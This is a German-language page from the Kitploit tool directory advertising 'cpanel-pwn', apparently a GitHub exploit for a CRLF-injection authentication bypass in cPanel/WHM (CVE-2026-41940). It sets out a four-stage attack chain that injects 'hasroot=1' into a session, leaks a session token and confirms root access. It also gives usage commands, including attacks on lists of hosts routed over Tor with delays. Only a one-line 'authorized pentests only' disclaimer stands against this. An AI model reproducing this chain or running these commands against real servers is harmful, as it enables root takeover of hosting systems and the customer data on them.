Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cpanel-pwn — cPanel/WHM CVE-2026-41940 CRLF-Injection-Authentifizierungs-Bypass-Exploit | Kitploit
Tools/GitHubGitHub/richflexpix/cpanel-pwn
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubrichflexpix/cpanel-pwn

cpanel-pwn

cPanel/WHM CVE-2026-41940 CRLF-Injection-Authentifizierungs-Bypass-Exploit

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cpanel-pwn

cPanel/WHM Sicherheits-Test-Toolkit. Implementiert die CVE-2026-41940 CRLF-Injection Authentifizierungs-Bypass und Post-Exploitation-Privilegien-Pivoting.

Tools

SkriptZweck
cpanel_exploit.pyCVE-2026-41940: CRLF-Injection → WHM-Auth-Bypass → Root-Zugriff

CVE-2026-41940

Typ: CRLF-Injection → Authentifizierungs-Bypass → Root-RCE
Betroffen: cPanel/WHM < gepatchte Versionen
Angriff: Pre-Auth-CRLF-Injection im Basic-Auth-Header injiziert in die serverseitige Session-Datei und erhöht eine nicht authentifizierte Session auf WHM-Root.

hasroot=1
root@kitploit:~
Stufe 1: POST /login/?login_only=1          → erstellt Pre-Auth-Session
Stufe 2: GET / Authorization:Basic <CRLF>   → injiziert hasroot=1, leakt cpsess-Token
Stufe 3: GET /scripts2/listaccts            → löst Session-Cache-Propagation-Gadget aus
Stufe 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + Version = ROOT-ZUGRIFF

Verwendung

root@kitploit:~
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only   # nur CRLF-Check, keine Priv-Esc

Autorisierung

Nur für autorisierte Penetrationstests.

Tool herunterladen